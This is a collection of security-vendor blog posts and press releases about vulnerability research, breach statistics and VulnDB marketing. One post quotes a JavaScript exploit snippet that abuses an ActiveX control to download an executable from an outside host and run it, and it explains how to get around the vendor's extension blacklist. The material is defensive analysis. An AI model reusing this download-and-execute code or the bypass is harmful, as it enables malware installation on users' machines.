Close

RBS Research Team Uncovers Vulnerability in Popular Honey Web Extension

Without the variety of browser extensions available today, the experience of using web browsers would be completely different. They are installed to manage passwords, block advertisements, or integrate functionality of all kinds into the browser.

Most browser extensions sit and wait silently in the background until summoned with a simple click of a button in the browser toolbar. The extensions then usually present a user interface dialog / window to configure or interact with them.

In this regard, the Honey browser extension is no different. The user visits a site and runs the extension to find available coupon codes. According to the vendor, the extension “automatically finds and applies coupon codes at checkout for over 30,000 shopping sites” and has been installed over 10 million times.

However, the extension’s behavior was noticeably different if activated from the browser toolbar. Generally, the UI dialog is positioned slightly over the toolbar, indicating a separate window. In this case, the Honey extension dialog was displayed within the web page area.

Password Checkup extension in comparison to the Honey extension

A quick look using the Google Developer Tools revealed that the Honey UI element was indeed not an overlay on top of the browser window but injected into the web page.

div tag injected to web page by the Honey extension

What does this mean?

This is problematic as the visited web site can now control all injected elements from the Honey extension, i.e. the extension’s user interface; including the login form. With a little bit of JavaScript on a web page that entices a user to use the Honey extension, an attacker can spoof the Honey extension elements and steal user information. As a proof-of-concept, we have developed a web page that displays the user password when entered (in a real-world scenario, the password would be silently saved by the attacker).

Proof-of-concept for stealing passwords

Of course, other attacks may also be possible. In particular, Google and Facebook authentication dialogs could also be replicated to gain access to user passwords for those accounts. However, this attack is mitigated by the fact that pop-up windows present an address bar, thereby disclosing a spoofed domain, which should (hopefully) be detected by the user before entering a password.

Our Research Team reported the vulnerability to the developers at the end of 2018. A fix was released with version 11.3.0 for Chrome on April 16, 2019, version 11.3.5 for Firefox on May 15, 2019. For Windows Edge, version 11.4.2.0 fixes the issue. Currently, no updated version is available for Safari. Users of Safari are urged not to activate and use the extension on untrusted websites.

Research credit goes to Sven Krewitt, Senior Vulnerability Researcher

A Scanning Solution is Only as Good as the Vulnerability Data That Drives it

We had some great conversations at JFrog’s user conference, SwampUp 2019. Brian Martin, our Vice President of Vulnerability Intelligence, took part in an all-star keynote of experts where he discussed how our VulnDB® service helps secure JFrog Xray user pipelines.

The integration of VulnDB allows DevOps teams to discover, receive notifications on, and help remediate vulnerabilities in third-party libraries and dependencies early in the development cycle. As JFrog puts it, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” Driven by Risk Based Security’s comprehensive data, Xray with VulnDB is the best security intelligence solution on the market for developers. 

Why does data from VulnDB give you an edge?

VulnDB is the most comprehensive source of vulnerability data available, with almost 69,000 vulnerabilities that are not found in CVE or the National Vulnerability Database (NVD). As Brian shared in his SwampUP keynote presentation, an average of about 70 new vulnerabilities are disclosed every day. This is an alarming volume, especially if your organization isn’t seeing the complete picture. That’s why our rallying cry is #BetterDataMatters. VulnDB is so much more advanced than any other database because we are looking for vulnerabilities and we speak with the DevOps community to ensure we are monitoring the libraries they are using. VulnDB includes more vulnerabilities, and carries more metadata and research on entries. This allows you to arm your organization with the most complete and up-to-date information available so you can make data-driven decisions to effectively manage and prioritize risk mitigation.

Taking this to mind, let’s look at some real-world applications. Recently, Sophos put out a very thought provoking article. The article made some very interesting points:

  1. Most vulnerabilities aren’t exploited, and if they are, they tend to have a high CVSS score.
  2. There is apparently no relationship between the proof-of-concept (PoC) exploit code being published online and the start of real-world attacks.
  3. In order to patch vulnerabilities, a “reference tagging” machine learning model is the most efficient method.

Sophos based their conclusions on data provided in a whitepaper that researchers from Cyntia, Virginia Tech, and the RAND Corporation published. The findings were extremely engaging, however, the data used to support these claims is lacking…comprehensiveness. 

Looking further into the data provided, it’s apparent that the researchers relied very heavily on security sensors based on CVE IDs, meaning that only vulnerabilities within CVE were being considered. This means that there are almost 69,000 vulns being missed in this study. To make matters worse, security scanning devices tend to cover half of the vulnerabilities in CVE, which makes the subset of data even smaller. 

In addition, Risk Based Security believes the machine learning models used in the study may have mis-categorized focused attacks. In situations where someone determines that a remote target is running specific software, then tries a comprehensive list of attacks against it, a detected attack would likely be labeled incorrectly. Since the researchers were basing their findings off of CVE data, it is highly likely that their sensors were not aware of specific vulnerabilities, resulting in a label of “Generic XSS” for example. This could have skewed results.

Last, these type of reports typically don’t share their full methodology, let alone what they are capable of matching against. This means that there is no way to reproduce or validate their findings. Unfortunately, if the research is solely based on CVE data it means that several vendors performing a similar study will also provide the same rough figures. CVE is the industry “standard,” yet it is missing a huge amount of vulnerabilities, with many of them possessing high CVSS scores and affecting major vendors. As previously stated, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” 

#BetterDataMatters. We would be very interested if the findings presented would be the same if more up-to-date data was used.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

Vulnerabilities disclosed during the first three months of 2019 reach a Q1 all-time high

RICHMOND, VA, May 16, 2019 — Risk Based Security today released the Q1 2019 Vulnerability QuickView Report.

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high.

CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities.

Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD in the first quarter. 45.8% of the vulnerabilities not published by NVD/CVE have a CVSS score of either 7.0 – 8.99 (high) or 9.0 – 10.0 (critical).

“This continues to illustrate the need for a comprehensive vulnerability intelligence feed and a mature process that can quickly determine the true risk and lead the organization to address issues in a risk-based methodology,” commented Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

Just over half of all reported vulnerabilities in Q1 2019 have a remote attack vector followed by almost a third having a user-assisted or context-dependent attack vector. Unlike previous quarters, over 13% of the reported vulnerabilities require local access to a system or device. While many are quick to dismiss local attacks as less risky, the increasing use of virtual technology and mobile devices may give an attacker a foothold on a device making local privilege escalation attacks more worrisome.

“The year-after-year increase in vulnerabilities being disclosed is clear, but there is no better example of the growing threats than this: in the last 24 hours, while finishing the Q1 2019 report, we pushed 241 new vulnerabilities to VulnDB,” commented Martin. “That should be an eye-opener and a serious concern to any organization, regardless of size or industry.”

Get your copy of the Q1 2019 Vulnerability QuickView Report

About the Vulnerability QuickView Report

The VulnDB QuickView report is possible through the research conducted by Risk Based Security. It is designed to provide an executive level summary of the key findings from RBS’ aggregation of vulnerabilities disclosed in Q1 2019. Contact Risk Based Security for a specific analysis of the vulnerabilities of critical relevance to your organization.

Over 1,900 breaches reported in the first three months of 2019, a new Q1 record

Risk Based Security today announced the release of its Q1 2019 Data Breach QuickView Report, which found that there were 1,903 publicly disclosed data compromise events in the first three months of the year, exposing over 1.9 billion records. No other first quarter has seen this level of activity, putting 2019 on pace to be yet another “worst year on record” for the number of publicly reported breaches.

“The number of data leaks – both in the form of open, unsecured services and credentials leaks – reached new levels this quarter,” commented Inga Goddijn, executive vice president and head of Cyber Risk Analytics. “Researchers are increasingly going public when they discover sizable, unprotected databases containing sensitive information and unfortunately, they aren’t terribly difficult to find when you know where to look.” The report finds that 67.6% of records compromised in Q1 were due to exposure of sensitive data on the Internet.

A particular area of interest for the research team is breach event timelines. Throughout 2018, the QuickView Reports focused on analysis of the time interval between the date an incident is first discovered by the breached organization, to the date the incident is first publicly disclosed. Initial research indicated the gap between discovery and disclosure incrementally shrank from 2014 though the first quarter of 2018, but stalled for the remainder of the year.

This lack of improvement prompted a new focus for 2019: digging deeper into the factors that may be influencing why some organizations are quicker to disclose a breach than others. This quarter, analysis focused on whether there is a correlation between discovery method and time to disclose. The theory being, organizations that are better able to detect a breach will also be better positioned to respond swiftly.

In an interesting twist, the data did indeed show there is a correlation between discovery method and time to disclose, but it was not the expected outcome. In Q1 2019, organizations that were alerted to the event from external sources – such as law enforcement, researcher or customer reporting, fraud monitoring or actor disclosure – were on average 31 days quicker to publicly disclose the event than organizations that learned of the incident through internal sources.

“Clearly our hypothesis, that organizations finding their own breaches will report them faster, was dead wrong this quarter,” commented Ms. Goddijn. “We will be following this metric closely throughout the year. For now, it’s too early to say whether the result we found for this quarter is an outlier or a fairly typical outcome.”

About the Data Breach QuickView Report

The Data Breach Quickview Report is made possible through the research conducted by Risk Based Security and Cyber Risk Analytics. It is designed to provide an executive level summary of the key findings from RBS’ analysis of breach activity disclosed in the first quarter of 2019. Contact Risk Based Security for any focused analysis of the breaches of specific interest to your organization.

Get your copy of the Q1 2019 Data Breach QuickView Report

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

Cyber Risk Analytics (CRA) provides actionable threat intelligence about organizations that have had a data breach or leaked credentials. This enables organizations to reduce exposure to the threats most likely to impact them and their vendor base. In addition, our PreBreach vendor risk rating, the result of a deep-view into the metrics driving cyber exposures, are used to better understand the digital hygiene of an organization and the likelihood of a future data breach. The integration of PreBreach ratings into security processes, vendor management programs, cyber insurance processes and risk management tools allows organizations to avoid costly risk assessments, while enabling businesses to understand its risk posture, act quickly and appropriately to proactively protect its most critical information assets.

For more information, please visit:
www.riskbasedsecurity.com
cyberriskanalytics.com
vulndb.cyberriskanalytics.com
yourciso.com
or call 855-RBS- RISK

From 4,000 to 40,000 Data Breaches: People are Still the Problem

On May 2, 2019, we hit a data breach milestone. The Cyber Risk Analytics research team added the 40,000th breach entry to our ever expanding data breach database. Coming hot on the heels of the 200,000th vulnerability added to VulnDB, it can be tempting to think much of the breach activity taking place over the years has been the result of the endless onslaught of software weaknesses. After all, it doesn’t take much digging to find high profile breach examples attributed to unpatched vulnerabilities (we’re looking at you, Equifax).

“If we look back through the history of how we got to 40,000 breaches, we can see what a truly difficult task it is to keep sensitive data secure, ” commented Inga Goddijn, EVP for Risk Based Security and head of Cyber Risk Analytics. “Yes, attack methods change over time and patching is more challenging than ever, but breaches can come from anywhere there is data.”

Comparing the 4,000th entry to the 40,000th highlights the point. Back in August of 2007, an employee of Spotsylvania County, Virginia was working in the conference room of a public building. She stepped away for a moment and upon her return, found the laptop she was working on was gone. Typical of the times, 3,000 sensitive records containing the personal information of fellow employees, as well as details from business licenses and property tax bills, were held directly on the machine. The laptop was password protected, but no encryption was applied.

“Stolen laptops were the number one breach type back in 2007, accounting for 22.1% of all reported breaches while exposing 2.9% of records that year,” noted Ms. Goddijn. Fast forward to 2018, and the problem of sensitive data stored on unsecured laptops has been largely addressed. There were still 51 such events in 2018, but those accounted for fewer than 1% of breaches reported. Only 253,374 records were exposed by stolen laptops last year, barely registering in the context of the 5.1 billion total records compromised.

But let’s not celebrate prematurely. Unfortunately, the problem of sensitive data on unprotected equipment has been replaced by that of sensitive data unprotected in the cloud.

The incident at Ladders, Inc became our 40,000 entry, and in many ways it’s just as typical for 2019 as the Spotsylvania County incident was for 2007. On May 1st, it was reported that an open, unprotected Elasticsearch database was left exposed on the Internet. The AWS-hosted database contained a years’ worth of user profile data and recruiters’ information. In all, upwards of 13,700,000 records were exposed in the incident.

Moving sizable databases to the cloud has come with configuration concerns that simply were not a problem in 2007. As a result, inadvertent exposure of data on the web accounted for 4.1% of breaches reported in 2018, exposing a whopping 1.9 billion (or 39.1%) records.

“Unsecured databases have become the stolen laptops of the time,” Ms Goddijn commented. “We may have conquered the equipment problem, but we are still seeing a multitude of preventable breaches; that is to say the means for avoiding the data loss in the first place is largely within the organization’s control.”

CRA data breach statistics - May 2019


All of the latest breach trends can be found in the soon-to-be-published Q1 2019 Data Breach QuickView Report. Check back here on May 7th, when the report becomes publicly available. In the interim, all the findings from 2018 are still available in our 2018 Year End Report.

Vulnerability Fixes That Make You Go Hmm…

The VulnDB research team processes a large number of vulnerability reports, exploits, and vendor advisories on a daily basis. Each report is scrutinized, classified and added to the VulnDB vulnerability database. They are enriched with important details like affected versions, requirements for exploitation, and sometimes even identifying incorrect fixes.

The lack of available detail in public reports and disclosures often requires us to dig deeper to create the meaningful intelligence VulnDB is famous for. In some cases, our investigations lead our research team to suspect that something doesn’t quite add up.

Early March 2019, Kaspersky Labs published information about a stack-based buffer overflow that caught our attention. While these conditions have the potential to allow code execution, the advisory only states denial of service (DoS) as the potential impact. Exploitation also requires user interaction. This was something worth investigating further. The assessment of the affected versions (“UltraVNC before 1.2.2.3”) and the fix (revision 1206) also raised some questions, but first, let’s evaluate the vulnerability itself.

Looking at the fixing changeset, the affected function ClientConnection:: ShowConnInfo() was changed to address the reported stack-based buffer overflow. This appeared to be triggerable by a specially crafted VNC server, when displaying connection information.

screenshot of code including the snprintf function

So far, so good. A sprintf() type function is replaced by _snprintf() with a buffer length limitation. However, looking at a larger part of the function context raised some eyebrows.

screenshot of code limiting the size when invoking _snprintf to 20148

The savvy developer may have already spotted the issue here. The destination buffer is only 2048 bytes is size. Limiting the size when invoking _snprintf() to 20148 does not prevent the buffer overflow, so this apparent typo leaves the application prone to the vulnerability. We downloaded version 1.2.2.3, as “UltraVNC before 1.2.2.3” were reported vulnerable. That’s when we noticed that 1.2.2.3 was released November 11, 2018, about two months before the fix in the repository.

things that make you go hmmm - Fry

At this point we have:

  • A stack-based buffer overflow, reported as DoS only
  • A typo in the fix, which looks insufficient
  • Ambiguous version information

When it comes to creating VulnDB entries, we are sometimes driven by what we call VulnDB OCD. We decided to keep digging and figure out what was really going on.

To trigger the vulnerability, we need to create a VNC server and control one of the parameters used in the _snprintf()call. This could be done via the name associated with the desktop in a ServerInit message (see RFC 6143 – The Remote Framebuffer Protocol). We implemented a Proof-of-Concept using libvncserver and changing the response in the rfbProcessClientInitMessage() function in rfbserver.c.

screenshot of vncviewer.exe - pointer to next seh record

When connecting to our VNC server using the vncviewer.exe, the stack-based buffer overflow could be triggered when the user displays the connection information (e.g. via the title context-menu). While this allowed to overflow a wide range of stack memory, exploitation of this vulnerability is mitigated by modern security features such as DEP, SafeSEH, or SEHOP. This is probably the reason why this is initially classified as a denial of service issue. However, at this point, a bypass of these features can’t be ruled out. In particular, ASLR (Address Space Layout Randomization) is not enabled in the application, which aids when using return-oriented programming (ROP) techniques to bypass e.g. DEP.

(As a side-note: a crash in a client application requiring user interaction, e.g. connecting to a specially crafted VNC server, would not be classified as a vulnerability, but rather a stability issue).

On March 14, 2019, a new version (1.2.2.4) was released, which included the insufficient fix. We tested this version against our VNC server and, not surprisingly, could still reproduce the stack-based buffer overflow. We then contacted the vendor to inform them the incomplete fix and quickly received a response that the issue was corrected with revision 1216 with the vendor silently updating 1.2.2.4 as of March 19, 2019.

The result of our brief excursion:

  • The denial of service non-issue turned out to be potentially exploitable for arbitrary code execution.
  • Version 1.2.2.3 was vulnerable, even though the advisory suggested otherwise.
  • Early downloads of 1.2.2.4 were affected due to a typo in the initial fix.
  • Only version 1.2.2.4 downloaded after March 19, 2019 addresses the vulnerability with a silent fix.

Hmmm indeed.

Learn more about how VulnDB and our research team can equip your security team with better data.

Blacklisting Limitations: Poor Cisco Fixes and Korean 0-days

Using blacklisting to fix vulnerabilities is rarely the right approach. That should not come as a surprise to anyone, and we all know variants of the saying: “The developer has to determine all cases of bad input; the attacker just has to determine the one that was missed.” Yet this does not stop vendors from still resorting to basic blacklisting approaches to “fix” vulnerabilities in their products.

In January 2019, Cisco addressed a vulnerability in their RV320 and RV325 VPN routers that allowed unauthenticated, remote attackers to disclose sensitive diagnostics information. This was possible by accessing the /cgi-bin/export_debug_msg.exp CGI program in the web-based management interface. The proper fix would be to ensure that only authenticated, privileged users can access the CGI program. Cisco decided on a different approach…

Last week, researchers disclosed that Cisco simply restricted access to the CGI program if requests come from curl HTTP user agents. The reason is likely that the PoC provided to Cisco by the researcher was using curl. Naturally, this “fix” is trivial to bypass by simply changing the HTTP user agent being sent as part of the request. Cisco has acknowledged that the original fix is incomplete and that they’re working on a new one.

Cisco are not the only ones to make mistakes like these. We recently completed a research project for some of our major Korean customers (more on that in a later post). As part of the project we reviewed the July 2014 version of a monthly report about malicious code trends published by KISA (Korea Internet & Security Agency). On pages 29 and 30 of the report, it shows a JavaScript file with malicious code that exploited a 0-day vulnerability in the HandySoft HShell ActiveX control by combining three unsafe methods.

A snippet of the relevant code:

obj.DownloadFromURL("http://www.sdgfaith.com/files/env/image/jpg/last.gif", "c:\\windows\\temp\\SearchMon.exe", 1, 1);
setTimeout(function() {
   if(obj.IsFileExist("c:\\windows\\temp\\SearchMon.exe"))
      obj.ShellExec("", "c:\\windows\\temp\\SearchMon.exe", "", "c:\\", 0, 0, 0);
}, 20000);

The methods in question are: DownloadFromURL(), IsFileExist(), and ShellExec(). Three method names that one generally does not want to see in safe-for-scripting ActiveX controls, as it is not functionality that websites should have access to.

At some point, the vendor attempted to fix these vulnerabilities. Instead of questioning whether these were sensible functions to have in a safe-for-scripting ActiveX control, the vendor instead opted – similar to Cisco – for a blacklisting approach. A validation function was introduced that restricts the file extensions that are accepted by the DownloadFromURL() and ShellExec() methods. However, the list is hardly exhaustive when it comes to dangerous file types, as it only covers: “.exe”, “.com”, “.bat”, “.cmd”, “.scr”, “.msi”, and “.vbs”. While it successfully blocked the 0-day exploit, there are many obvious dangerous file types not covered by this list. This makes it trivial to tweak the original exploit to bypass the check and still download and execute malicious code on a user’s system when visiting a web page.

Full details on the vulnerability are available in our research report.

In general, if a vendor’s immediate idea for fixing a vulnerability is to introduce a blacklist, they should pause and reconsider. What is the vulnerability’s root cause? In most cases, there is a much better way to solve it. If restrictions still seem like the right approach, the default should be a very limited whitelist. If a vendor can’t think of a good whitelist, they probably can’t come up with a good blacklist. In such cases, it’s very likely that the design of the functionality is just insecure.

200,000th Vulnerability Added To VulnDB (And Why You Should Care)

RICHMOND, VA, March 29, 2019 — Risk Based Security today announced the addition of the 200,000th vulnerability to VulnDB, the preeminent database of vulnerability intelligence. This significant record highlights the scale of the security challenges faced by organizations, and the sheer volume of data that they need to be able to process.

“With over 4,800 new vulnerabilities already disclosed in 2019, we are seeing an early indication that the security problems organizations have been facing aren’t going away this year, or anytime soon,” commented Jake Kouns, CISO for Risk Based Security.

The 200,000th addition is a reflected cross-site scripting (XSS) vulnerability [VulnDB ID 201564] in the popular Malware Information Sharing Platform (MISP). This milestone reflects the steady and ongoing disclosure of vulnerabilities in every type of software, even that which is designed to help achieve security.

The recently published 2018 Year End Vulnerability QuickView Report found that there were more than 22,000 new vulnerabilities disclosed in 2018. Risk Based Security’s VulnDB research team works hard to ensure that they track any vulnerability, but most important are the issues that could impact their customers. Their focus on having the broadest and most detailed intelligence possible has pushed VulnDB to have catalogued 33% more disclosed vulnerabilities than are tracked by the industry-standard public sources, Common Vulnerabilities and Exposures (CVE) or the National Vulnerability Database (NVD). VulnDB is able to provide organizations with the intelligence they need to make more informed risk decisions based on over 66,000 additional vulnerabilities only captured in VulnDB.

The wider implication is clear: without better data, organizations cannot accurately prioritize critical issues. Risk Based Security’s mission is to ensure their clients have access to the data they require. “To understand what motivates us, look no further than our company name,” commented Jake Kouns. “We provide a platform and superior intelligence so our clients can make Risk Based Security decisions on how to better handle vulnerabilities and understand the vendor and products they rely on.”

“As the tools that help researchers find vulnerabilities improve, and as that pool of researchers grows, the rate of disclosures will continue to rise. Organizations will be forced to dedicate more time and resources to keep up with the risks posed,” said Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

VulnDB is the most complete and timely vulnerability intelligence available

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API that allows easy integration into GRC tools and ticketing systems.

VulnDB allows organizations to search and be alerted on the latest vulnerabilities, both in end-user software and 3rd-party libraries or dependencies. It features simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

VulnDB, by the numbers:

  • 200,000 vulnerabilities all time and growing
  • Over 4,900 vulnerabilities YTD 2019
  • Over 66,000 vulnerabilities missing from CVE
  • Over 22,000 vendors included

Learn more about VulnDB or request a demo.

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Their products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, the YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

More Than 22,000 Vulnerabilities Disclosed In 2018

The report confirms that CVE / National Vulnerability Database (NVD) continues to face challenges staying up-to-date with the relentless pace of new disclosures. The VulnDB research team at Risk Based Security (RBS) catalogued 6,780 more vulnerabilities than CVE/NVD. This is notable as it represents nearly 31% of all the published vulnerabilities in 2018.

RBS VP of Vulnerability Intelligence, Brian Martin advises, “Companies can’t afford to miss almost a third of vulnerabilities each year. It is time to move from a ‘good enough’ mentality and toward the paradigm of ‘Better Data Matters’ that Risk Based Security and its VulnDB research is built upon. Missing 31% is unacceptable in today’s cyber landscape, especially when tools are available to prevent it.”

Of the 6,780 vulnerabilities not published by the CVE/NVD, 45.5% have a CVSSv2 score between 7.0 – 10.0, and 13.6% scored between 9.0 – 10. This once again calls attention to the importance of having a comprehensive view into vulnerability activity. Martin added, “No organization can afford to ignore a single vulnerability ranked between a 7 and 10, let alone over 3,000 of them!”  These vulnerabilities cover a wide variety of software including web browsers, enterprise tools, and third-party libraries that impact hundreds or thousands of software packages.

The most significant vulnerability attack type for 2018 is Input Manipulation. “68.7% of the disclosed vulnerabilities are due to insufficient or improper input validation,” expounds Martin, “While a lot of vulnerabilities fall under this umbrella, including cross-site scripting, SQL injection, shell command injection, and buffer overflows, it underlines that software developers still struggle to carefully validate untrusted input. Having a mature SDL that includes secure coding practices can iron out many such issues and significantly reduce the threat from attackers.”

The Vulnerability Quick view report also shows that 32.7% of 2018’s vulnerabilities have public exploits and 50.5% can be exploited remotely, meaning that few of the reported vulnerabilities require any type of physical proximity to a system or a device to be exploited. Another revealing finding, 27.1% of vulnerabilities had no known solution, which unfortunately is up 5% from 2017 based on current data. And for those following the hot topic of bug bounty programs, almost 8% of vulnerabilities were coordinated through bug bounty programs – a solid increase from the 5.8% last year.

Notably, SCADA vulnerabilities are on the rise. 3.5% of 2018 vulnerabilities were classified as SCADA vulnerabilities, double that of last year. The report notes that this will be an area to keep an eye on as more SCADA systems become internet accessible for convenience without full realization to safety risk and ramifications.

About the Vulnerability QuickView Report

Because RBS believes that the ability to properly apply vulnerability data is vital to business decision making processes, the VulnDB QuickView report is created through extensive research conducted by Risk Based Security’s VulnDB team. It is designed to provide an executive level summary of the key findings from RBS’ analysis of vulnerabilities disclosed in 2018. Contact Risk Based Security for any specific analysis of the 2018 vulnerabilities.

Get your copy of the 2018 Year End Vulnerability QuickView report here

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, VulnDB and Cyber Risk Analytics (CRA), provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information, please visit:

https://www.riskbasedsecurity.com/

https://vulndb.cyberriskanalytics.com/

https://www.cyberriskanalytics.com/

https://www.yourciso.com/

Contact RBS via [email protected] or call 855-RBS- RISK

Over 6,500 Data Breaches and More Than 5 Billion Records Exposed in 2018

Risk Based Security today announced the release of its Year End 2018 Data Breach QuickView Report, showing there were 6,515 publicly disclosed data compromise events through December 31, 2018, exposing over 5 billion sensitive records. While the year ended below 2017’s high mark of 6,728 reported breaches, a continuing slow trickle of new breach information may end up placing 2018 in the top spot.

“It’s been an unusual year for breach activity,” commented Inga Goddijn, Executive Vice President of Risk Based Security. “We’ve been monitoring breach events for more than a dozen years now and this is the first time we’ve observed a slow start to the year following by a growing number of disclosures as the months pass. We suspect various factors including the allure of crypto mining had an impact on breach activity early in the year, but disclosures rebounded throughout the summer and into the last quarter.”

Following on the theme of disclosure, this year the Data Breach Quick View Reports have been examining the average number of days between breach discovery and reporting. Ms Goddijn said of the work, “we were curious to see if the General Data Protection Regulation (GDPR) would have a discernible impact on how long it takes for an organization to go public with a breach report.” Curiously, the average number of days between discovery and disclosure has been approximately 49 days for the past two years. Ms Goddijn commented, “from 2014 until 2017, the average number of days had been declining. We assumed awareness of GDPR reporting requirements would put pressure on organizations to continue to close the gap. So it was surprising to see 2018 end at an average of 49.6 days, slightly above 2017’s average of 48.6 days.”

One possible reason for the lack of improvement is the different obligations and timelines that apply for notifying regulators of a breach versus notifying individuals at risk of harm. It is worthwhile to keep in mind that while much has been said about the GDPR’s 72 hour window for reporting a breach to regulators, individuals need only be notified if there is a high risk of harm. What’s more, if the notification to individuals is triggered, the notice must be made without unreasonable delay rather than within a specified number of days. As is evident in recent reporting, this can generate a significant number of disclosures to regulators – ranging from minor data handling errors to serious data compromise events – but not necessarily impact the number of breaches that actually see the light of day.

Ms Goddijn concluded, “overall, we’re encouraged by the results from 2018. The number of records exposed did come down about 36% compared to last year and while the number of breaches is still quite high, we did not see a repeat of widespread events like WannaCry and Petya/NotPetya. After year upon year of bad news, we’ll take improvement where it can be found.”

About the Data Breach QuickView Report

The Data Breach QuickView report is possible through the research conducted by Risk Based Security. It is designed to provide an executive level summary of the key findings from RBS’ analysis of breach activity disclosed in 2018. ContactRisk Based Security for any focused analysis of the 2018 breaches of specific interest to your organization.

Get your copy of the Year End 2018 Data Breach QuickView Report

Tune In To The 2018 Year End Data Breach Quick View Report Webinar

We invite you to attend “The Data Breach Landscape – Trends and Highlights From 2018”  webinar being held on February 28th at 11:30 a.m. Central where we’ll take a deeper dive into the Year End Data Breach report. Please click the link below to register or watch on demand:

Register For The Data Breach Landscape Webinar

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

Cyber Risk Analytics (CRA) provides actionable threat intelligence about organizations that have had a data breach or leaked credentials. This enables organizations to reduce exposure to the threats most likely to impact them and their vendor base. In addition, our PreBreach vendor risk rating, the result of a deep-view into the metrics driving cyber exposures, are used to better understand the digital hygiene of an organization and the likelihood of a future data breach. The integration of PreBreach ratings into security processes, vendor management programs, cyber insurance processes and risk management tools allows organizations to avoid costly risk assessments, while enabling businesses to understand its risk posture, act quickly and appropriately to proactively protect its most critical information assets.

Risk Based Security has a suite of products that enables organizations make data-driven decisions to effectively manage and prioritize risk mitigation. See how VulnDB, Cyber Risk Analytics, and YourCISO can help you or your vendors stay saecure in this rapidly evolving environment.